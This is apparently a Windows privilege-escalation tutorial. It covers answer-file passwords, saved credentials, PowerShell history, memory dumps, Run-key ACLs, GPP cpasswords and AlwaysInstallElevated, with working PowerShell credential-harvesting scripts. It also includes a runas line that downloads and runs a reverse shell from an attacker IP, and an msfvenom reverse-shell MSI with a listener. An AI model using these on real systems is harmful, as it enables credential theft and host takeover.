# Windows

## Unattended Installation

Unattend.xml and Autounattend.xml are the answer files Windows Setup reads during an unattended installation. They are frequently left on disk afterwards and may still hold local account and auto-logon passwords, in plain text or base64-encoded, next to other host configuration.

When a password is encoded, Setup stores Base64(UTF-16LE(password + element name)), i.e. the AutoLogon `Password` value has the string "Password" appended and `AdministratorPassword` has "AdministratorPassword" appended. Decoding is therefore base64-decode, read as UTF-16LE, drop the trailing element name; decoders that only strip "Password" leave junk on the administrator value.

Common locations:

* C:\Windows\Panther\Unattend.xml
* C:\Windows\Panther\Autounattend.xml
* C:\Windows\Panther\Unattend\Unattend.xml
* C:\Windows\System32\Sysprep\Unattend.xml
* C:\Windows\System32\Sysprep\sysprep.xml
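The following PowerShell is an added example, not code from the original page: it checks the usual answer-file locations, pulls every `Password` / `AdministratorPassword` element out of the XML and decodes the base64 form by stripping the element name after UTF-16LE decoding. The XML at the bottom is constructed for the example (the accounts and passwords in it are made up) so the decoder can be exercised on a box with no leftover answer files.

```powershell
# Added example (not from the original page): find leftover answer files and
# pull the passwords out of them. Paths are the usual Setup/Sysprep locations.
$candidates = @(
    "$env:SystemRoot\Panther\Unattend.xml",
    "$env:SystemRoot\Panther\Autounattend.xml",
    "$env:SystemRoot\Panther\Unattend\Unattend.xml",
    "$env:SystemRoot\System32\Sysprep\Unattend.xml",
    "$env:SystemRoot\System32\Sysprep\sysprep.xml"
)

function Get-UnattendPasswords {
    param([xml]$Doc)
    # Elements of interest look like:
    #   <Password><Value>BASE64-OR-PLAIN</Value><PlainText>false</PlainText></Password>
    # local-name() sidesteps the urn:schemas-microsoft-com:unattend namespace.
    $nodes = $Doc.SelectNodes('//*[local-name()="Password" or local-name()="AdministratorPassword"]')
    foreach ($node in $nodes) {
        $valueNode = $node.SelectSingleNode('*[local-name()="Value"]')
        if (-not $valueNode) { continue }
        $plainNode = $node.SelectSingleNode('*[local-name()="PlainText"]')
        $raw = $valueNode.InnerText
        if ($plainNode -and $plainNode.InnerText -eq 'true') {
            $clear = $raw
        } else {
            # Setup stores Base64(UTF-16LE(password + <element name>)), so strip that suffix.
            $decoded = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($raw))
            $suffix  = $node.LocalName
            if ($decoded.EndsWith($suffix)) {
                $clear = $decoded.Substring(0, $decoded.Length - $suffix.Length)
            } else {
                $clear = $decoded
            }
        }
        [pscustomobject]@{
            Section  = $node.ParentNode.LocalName   # e.g. AutoLogon or UserAccounts
            Element  = $node.LocalName
            Password = $clear
        }
    }
}

# Live check of the usual locations
foreach ($f in $candidates) {
    if (Test-Path -Path $f) {
        Write-Host "[*] $f"
        Get-UnattendPasswords -Doc ([xml](Get-Content -Path $f -Raw))
    }
}

# Constructed sample (made up for this example) so the decoding can be tried offline.
# The encoded value is Base64(UTF-16LE("<password>" + "Password")).
$sample = @'
<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Username>Administrator</Username>
        <Password>
          <Value>UABAAHMAcwB3ADAAcgBkACEAUABhAHMAcwB3AG8AcgBkAA==</Value>
          <PlainText>false</PlainText>
        </Password>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>Summer2024</Value>
          <PlainText>true</PlainText>
        </AdministratorPassword>
      </UserAccounts>
    </component>
  </settings>
</unattend>
'@
Get-UnattendPasswords -Doc ([xml]$sample) | Format-Table -AutoSize
```

The XPath works on the element's local name on purpose: answer files carry the `urn:schemas-microsoft-com:unattend` default namespace, and `$Doc.unattend.settings...` style navigation or a namespace-less XPath silently returns nothing.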

## Windows Credential Manager

On a production server an administrator may have to enter the same credentials over and over, so they (and ordinary users) save them in Credential Manager for convenience. Credential Manager stores both Web Credentials and Windows Credentials.

Once an attacker has a session on the host as that user, physically or remotely, the saved credentials can be used to run programs under the stored identity.

To list the stored credentials:

```
cmdkey /list
```

The password itself is never displayed, but if a credential is saved for a user we can have runas pull it instead of prompting (the /savecred switch only works when an entry exists for that user, and it is ignored on Home editions):

{% code overflow="wrap" %}

```
runas.exe /savecred /user:administrator cmd

:: Fetch and run a Nishang reverse shell hosted on the attacker box
runas.exe /user:ACCESS\Administrator /savecred "powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.2/rev.ps1')"
```

{% endcode %}

## PowerShell History

PowerShell's PSReadLine module, loaded by default in the PowerShell 5+ console, appends every command typed interactively to a plain-text history file. When an administrator has run commands with hard-coded credentials in a regular user's environment (a student workstation, for example) and has not cleared that history afterwards, the credentials, configuration settings and so on stay readable to whoever can read the file. The file is per user and per host (ConsoleHost is the console; the ISE does not use PSReadLine at all); the one below belongs to user Test.

The default location for the PowerShell command history:

{% code overflow="wrap" %}

```
C:\Users\Test\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```

{% endcode %}

{% code overflow="wrap" %}

```
# $env:APPDATA already ends in \AppData\Roaming, so \Roaming must not be appended again
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
```

{% endcode %}
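As an added example (not part of the original page), the PowerShell below gathers every PSReadLine history file the current account can read: the running session's own path from `Get-PSReadLineOption` (which honours a non-default `HistorySavePath`) plus the default location under every profile on the box, and flags lines that look like they carry credentials. The keyword list is an assumption and should be tuned to the environment.

```powershell
# Added example (not from the original page): collect every PSReadLine history file
# this account can read and flag lines that look like they carry credentials.
$secretPattern = 'password|passwd|pwd=|secret|token|apikey|ConvertTo-SecureString|-Credential|net user|runas|cmdkey'

function Find-HistorySecrets {
    $files = @()
    # History path of the running session; honours a non-default HistorySavePath.
    if (Get-Command -Name Get-PSReadLineOption -ErrorAction SilentlyContinue) {
        $files += (Get-PSReadLineOption).HistorySavePath
    }
    # Default per-user location for every profile on the box (readable where ACLs allow it).
    # The host name is part of the file name: ConsoleHost_history.txt is the console,
    # other hosts (e.g. VS Code) write their own *_history.txt next to it.
    $files += Get-ChildItem -Path 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\*_history.txt' -ErrorAction SilentlyContinue |
        Select-Object -ExpandProperty FullName
    foreach ($f in ($files | Where-Object { $_ } | Sort-Object -Unique)) {
        $n = 0
        foreach ($line in (Get-Content -Path $f -ErrorAction SilentlyContinue)) {
            $n++
            if ($line -match $secretPattern) {   # -match is case-insensitive by default
                [pscustomobject]@{ File = $f; Line = $n; Command = $line }
            }
        }
    }
}

Find-HistorySecrets | Format-Table -AutoSize -Wrap
```

Other users' profile folders are normally only readable by administrators, so from a low-privileged shell this usually returns just your own history; it becomes useful again once you have a second account or a local admin session and want to check what the previous operators typed.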

## Process Memory

To list the running processes (in PowerShell, ps is an alias of Get-Process):

```
ps
```

Then write a full memory dump of the process of interest with Sysinternals ProcDump (-ma dumps all of the process memory rather than the mini-dump subset):

```
# Find the PID
ps | findstr "<process>"

.\procdump64.exe -accepteula -ma <id>
```

Then search the dump for credential-like strings. Plain strings only reports ASCII runs; Windows keeps most strings in memory as UTF-16LE, so run it a second time with -e l to catch those as well:

```
strings <file> | grep -i pass
```
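When the dump has to be searched on the Windows box itself, the PowerShell below (an added example, not code from the original page) does what `strings` plus `grep` do, but scans for both printable-ASCII and UTF-16LE runs, which is what a Windows process mostly holds. The byte buffer at the end is constructed for the example with made-up credentials; `Find-DumpStrings` is a name chosen here, not a standard cmdlet.

```powershell
# Added example (not from the original page): a 'strings'-style scanner that finds
# both ASCII and UTF-16LE strings in a dump and keeps the ones matching a pattern.
function Find-DumpStrings {
    param(
        [Parameter(Mandatory)][byte[]]$Bytes,
        [string]$Pattern = 'pass',
        [int]$MinLength = 6
    )
    # Map each byte to one char (ISO-8859-1) so regex offsets equal byte offsets.
    $latin1 = [System.Text.Encoding]::GetEncoding(28591)
    $text = $latin1.GetString($Bytes)
    $results = @()
    # Printable-ASCII runs
    foreach ($m in [regex]::Matches($text, "[\x20-\x7e]{$MinLength,}")) {
        if ($m.Value -match $Pattern) {
            $results += [pscustomobject]@{ Offset = $m.Index; Encoding = 'ascii'; Value = $m.Value }
        }
    }
    # UTF-16LE runs: a printable ASCII char followed by a NUL byte, repeated
    foreach ($m in [regex]::Matches($text, "(?:[\x20-\x7e]\x00){$MinLength,}")) {
        $s = $m.Value -replace "`0", ''
        if ($s -match $Pattern) {
            $results += [pscustomobject]@{ Offset = $m.Index; Encoding = 'utf16le'; Value = $s }
        }
    }
    $results
}

# Constructed sample (made up for this example): an ASCII credential and a UTF-16LE
# credential separated by filler bytes, as they might sit in a process heap.
$sample = [byte[]]((New-Object byte[] 64) +
    [System.Text.Encoding]::ASCII.GetBytes('user=svc_backup;password=Hunter2!') +
    (New-Object byte[] 32) +
    [System.Text.Encoding]::Unicode.GetBytes('Password: W1nter2024') +
    (New-Object byte[] 16))
Find-DumpStrings -Bytes $sample | Format-Table -AutoSize

# Against a real dump (ReadAllBytes is limited to 2 GB; chunk larger dumps):
# Find-DumpStrings -Bytes ([System.IO.File]::ReadAllBytes('C:\Temp\proc.dmp')) -Pattern 'pass'
```

The first regex deliberately uses the Latin-1 decoding rather than `[Text.Encoding]::ASCII`, which would replace every non-ASCII byte with `?` and therefore break UTF-16 detection.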

## Registry Autoruns

Programs run for every user at logon (machine-wide):

```
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
```

Programs run at logon of the current user only:

```
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
```

Configuration of Windows services (ImagePath, service account, start type). Most services run as SYSTEM, so a writable key or binary under here is a direct route to elevated privileges:

```
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
```

### Enumeration

To check who can modify the machine-wide Run key:

```
Get-ACL -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' |
Format-List
```

If a normal user has Full Control (or any write right) on that key, or on the executables and folders its values point to, we can plant a program that runs the next time a more privileged user logs on. The entry executes in the context of the user logging on, so this yields an administrator session rather than SYSTEM, and only once an administrator actually logs on.

## ACLS

We can check for ACL misconfigurations with icacls (F = full control, M = modify, W = write; (OI)(CI) means the entry is inherited by files and subfolders):

```
icacls <path>
```

If we have Full Control over a folder, we can, for example, grant our user full access to a file inside it. This works directly when the file inherits the folder's ACL; if the file has its own ACL, Full Control on the folder still includes the right to delete its children, so the file can be replaced instead:

```
icacls <file> /grant <user>:F
```
```
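The PowerShell below is an added example, not code from the original page, and ties the two preceding sections together: it walks the Run/RunOnce keys, extracts the executable from each command line and reports whether the current account (by its own SID or any of its group SIDs) holds a write-class right on the registry key, the target binary, or the binary's folder. `Test-WritableByMe` and the other function names are chosen here; Deny ACEs and rights shown as raw numbers (generic rights) are not evaluated.

```powershell
# Added example (not from the original page): list Run/RunOnce autostart entries and report whether
# the current account can write the registry key, the target executable, or its directory.
$me     = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$mySids = @($me.User.Value) + @($me.Groups | ForEach-Object { $_.Value })

function Test-WritableByMe {
    param([string]$Path)   # file, directory or registry path such as HKLM:\...
    try { $acl = Get-Acl -Path $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }   # Deny ACEs are not modelled here
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if ($mySids -notcontains $sid) { continue }
        # FileSystemAccessRule exposes FileSystemRights, RegistryAccessRule exposes RegistryRights;
        # whichever one is absent evaluates to an empty string. Generic rights that ToString()
        # renders as a number are not matched.
        $rights = "$($ace.FileSystemRights)$($ace.RegistryRights)"
        if ($rights -match 'FullControl|Modify|Write|SetValue|CreateSubKey') { return $true }
    }
    return $false
}

function Get-ExecutableFromCommand {
    param([string]$Command)
    $Command = $Command.Trim()
    if ($Command.StartsWith('"')) {
        $end = $Command.IndexOf('"', 1)
        if ($end -gt 1) { return $Command.Substring(1, $end - 1) }
    }
    # Unquoted: everything up to the first ".exe" (spaces in the path included)
    $m = [regex]::Match($Command, '^(.+?\.exe)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($Command -split ' ')[0]
}

$runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
           'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
           'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'

function Get-AutorunWeaknesses {
    foreach ($key in $runKeys) {
        if (-not (Test-Path -Path $key)) { continue }
        $keyWritable = Test-WritableByMe -Path $key
        foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # PSPath, PSParentPath, ... are not registry values
            $exe = Get-ExecutableFromCommand -Command ([string]$p.Value)
            if (-not $exe) { continue }
            $dir = Split-Path -Path $exe -Parent
            [pscustomobject]@{
                Key         = $key
                Name        = $p.Name
                Command     = $p.Value
                KeyWritable = $keyWritable
                ExeWritable = (Test-Path -Path $exe) -and (Test-WritableByMe -Path $exe)
                DirWritable = ($dir -and (Test-Path -Path $dir)) -and (Test-WritableByMe -Path $dir)
            }
        }
    }
}

Get-AutorunWeaknesses | Format-Table -AutoSize -Wrap
```

The HKCU entries will always show `KeyWritable` as true for your own account; the rows worth acting on are HKLM entries, or any entry whose binary or folder is writable, since those run when another (ideally administrative) user logs on.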

## SYSVOL & GPP (MS14-025)

Group Policy Preferences could set local account passwords, which were written into the policy XML files in SYSVOL (Groups.xml, Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml, Printers.xml) as a cpassword attribute. The value is AES-256 encrypted with a key Microsoft itself published, and SYSVOL is readable by every domain user, so any domain account can recover the passwords. The MS14-025 patch stops new passwords from being written but leaves existing ones in place, so they are still worth searching for.

Search every policy for the attribute:

```
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
```

Decrypt a value with the gpp-decrypt script that ships with Kali:

```
gpp-decrypt "<cpassword>"
```
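When gpp-decrypt is not at hand, the decryption is short enough to do in PowerShell on the domain-joined box. The code below is an added example (not from the original page): it base64-pads and AES-256-CBC-decrypts a cpassword with the key from Microsoft's MS-GPPREF specification and a zero IV, and walks SYSVOL to decrypt every value it finds. The `Protect-GppCpassword` encryptor is only there so the decryptor can be checked offline against a constructed value (the password used is made up); the SYSVOL path default assumes the session belongs to a domain account.

```powershell
# Added example (not from the original page): search SYSVOL for cpassword attributes and decrypt
# them with the AES-256 key Microsoft published in MS-GPPREF (Password Encryption).
$GppKey = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                   0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

function New-GppAes {
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key     = $GppKey
    $aes.IV      = New-Object byte[] 16     # GPP uses an all-zero IV
    return $aes
}

function Unprotect-GppCpassword {
    param([Parameter(Mandatory)][string]$Cpassword)
    # GPP strips the Base64 '=' padding; restore it before decoding.
    $b64 = $Cpassword.Trim()
    $b64 += '=' * ((4 - ($b64.Length % 4)) % 4)
    $cipher = [Convert]::FromBase64String($b64)
    $aes = New-GppAes
    $plain = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
    return [System.Text.Encoding]::Unicode.GetString($plain)   # passwords are stored as UTF-16LE
}

function Protect-GppCpassword {
    # Inverse operation, included only so the decryptor can be exercised offline
    # against a constructed value instead of a real policy file.
    param([Parameter(Mandatory)][string]$Password)
    $aes = New-GppAes
    $plain = [System.Text.Encoding]::Unicode.GetBytes($Password)
    $cipher = $aes.CreateEncryptor().TransformFinalBlock($plain, 0, $plain.Length)
    return ([Convert]::ToBase64String($cipher)).TrimEnd('=')
}

function Find-GppPasswords {
    # Walk every policy XML under SYSVOL; Groups.xml, Services.xml, ScheduledTasks.xml,
    # DataSources.xml, Drives.xml and Printers.xml are the files that may carry cpassword.
    param([string]$SysvolPath = "\\$env:USERDNSDOMAIN\SYSVOL\$env:USERDNSDOMAIN\Policies")
    Get-ChildItem -Path $SysvolPath -Recurse -Include *.xml -ErrorAction SilentlyContinue |
        Select-String -Pattern 'cpassword="([^"]+)"' -AllMatches |
        ForEach-Object {
            $file = $_.Path
            foreach ($m in $_.Matches) {
                [pscustomobject]@{
                    File     = $file
                    Password = Unprotect-GppCpassword -Cpassword $m.Groups[1].Value
                }
            }
        }
}

# Round trip on a constructed value (made up for this example)
$cp = Protect-GppCpassword -Password 'Summer2024!'
"$cp -> $(Unprotect-GppCpassword -Cpassword $cp)"

# Against a real domain (any domain user can read SYSVOL):
# Find-GppPasswords | Format-Table -AutoSize
```

An empty `cpassword=""` attribute is skipped by the regex; it appears in policies that were edited after MS14-025, where the password field was blanked but the XML kept.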

## AlwaysInstallElevated

If the AlwaysInstallElevated policy is enabled, Windows Installer runs every .msi with SYSTEM privileges, even when a low-privileged user starts it. The value must be 1 under both HKCU and HKLM; one of them alone does nothing. Check both:

{% tabs %}
{% tab title="First Step" %}

```
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
```

{% endtab %}

{% tab title="Second Step" %}
Create a msfvenom payload:

{% code overflow="wrap" %}

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -a x64 --platform windows -f msi -o ignite.msi
```

{% endcode %}
{% endtab %}

{% tab title="Third Step" %}
Upload the .msi to the target, start a listener on the attacker box, then install it silently on the target:

```
nc -nvlp <port>
```

```
msiexec /quiet /qn /i ignite.msi
```

{% endtab %}
{% endtabs %}
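Because the policy is only honoured when both hives agree, the PowerShell below (an added example, not code from the original page) reads both values and returns a single verdict before any MSI is built or uploaded. `Test-AlwaysInstallElevated` is a name chosen for this example, and the msiexec path in the comment is a placeholder.

```powershell
# Added example (not from the original page): the policy only takes effect when it is 1 under
# BOTH hives, so check both before spending time on an MSI payload.
function Test-AlwaysInstallElevated {
    $paths = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
             'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $state = foreach ($p in $paths) {
        # Missing key or value yields $null, which is treated as "not set"
        $v = (Get-ItemProperty -Path $p -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        [pscustomobject]@{ Hive = $p.Split(':')[0]; Value = $v; Set = ($v -eq 1) }
    }
    $state | Format-Table -AutoSize | Out-String | Write-Host
    return (@($state | Where-Object Set).Count -eq 2)
}

if (Test-AlwaysInstallElevated) {
    Write-Host '[+] AlwaysInstallElevated is set in both hives: an MSI installed by this user runs as SYSTEM'
    # Start the listener first, then e.g.:
    # msiexec /quiet /qn /i C:\Users\Public\ignite.msi
} else {
    Write-Host '[-] Not exploitable: the value must be 1 in both HKLM and HKCU'
}
```

Querying HKLM here needs no special rights; reading the policy key is allowed for standard users, it is only writing it that requires administrator privileges.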
